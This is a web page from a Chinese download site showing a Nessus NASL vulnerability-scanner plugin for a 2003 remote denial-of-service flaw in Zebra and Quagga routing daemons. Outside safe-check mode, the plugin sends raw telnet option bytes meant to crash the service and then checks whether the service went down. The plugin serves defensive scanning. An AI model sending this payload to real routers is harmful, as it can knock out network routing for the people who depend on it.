zebra_dos.nasl

来自「漏洞扫描源码,可以扫描linux,windows,交换机路由器」· NASL 代码 · 共 72 行

NASL

72 行

# MA 2003-11-17: added Services/zebra + MIXED_ATTACK supportif(description){        script_id(11925);        script_bugtraq_id(9029);        script_version("$Revision: 38 $");  	if ( defined_func("script_xref") ) script_xref(name:"RHSA", value:"RHSA-2003:307-01");	script_cve_id("CVE-2003-0795", "CVE-2003-0858");        name["english"] = "Zebra and Quagga Remote DoS";        script_name(english:name["english"]);        desc["english"] = "A remote DoS exists in Zebra and/or Quagga when sending a telnet option delimiter with no actual option data.An attacker may exploit this flaw to prevent this host from doing properrouting.This affects all versions from 0.90a to 0.93b.Solution: Quagga Version 0.96.4.Also see: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=107140Risk factor:High";        script_description(english:desc["english"]);        summary["english"] = "Attempts to crash the remote service Zebra and/or Quagga";        script_summary(english:summary["english"]);        script_category(ACT_MIXED_ATTACK);        script_copyright(english:"This script is copyright (C) 2003 Matt North");	script_require_ports("Services/zebra", 2601, 2602, 2603, 2604, 2605);	script_dependencie("find_service.nes");        family["english"] = "Denial of Service";        script_family(english:family["english"]);        exit(0);}# Maybe we should try this on any telnet server?port = get_kb_item("Services/zebra");if (! port) port = 2601;if (! get_port_state(port)) exit(0);if (safe_checks()){  banner = get_kb_item("zebra/banner/"+port);  if (!banner)  {    soc = open_sock_tcp(port);    if(!soc) exit(0);    banner = recv_line(socket: soc, length: 1024);    set_kb_item(name: "zebra/banner/"+port, value: banner);    close(soc);  }  if (banner && egrep(string: banner, 		pattern: "Hello, this is zebra \(version 0\.9[0-3][ab]?\)"))    security_hole(port: port);  exit(0);}soc = open_sock_tcp(port);if(!soc) exit(0);s = raw_string(0xff,0xf0,0xff,0xf0,0xff,0xf0);send(socket:soc, data:s);r = recv(socket: soc, length:1024);close(soc);alive = open_sock_tcp(port);if(!alive) security_hole(port);else close(alive);

zebra_dos.nasl - 源码说明

本页面展示了「漏洞扫描源码,可以扫描linux,windows,交换机路由器」中的 zebra_dos.nasl 源码文件，采用 NASL 编程语言编写，共 72 行代码。您可以在线阅读完整代码内容，也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与windows相关的技术资源，包括源代码、技术文档、电路图等，是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C

搜索代码Ctrl + F

全屏模式F11

增大字号Ctrl + =

减小字号Ctrl + -

显示快捷键?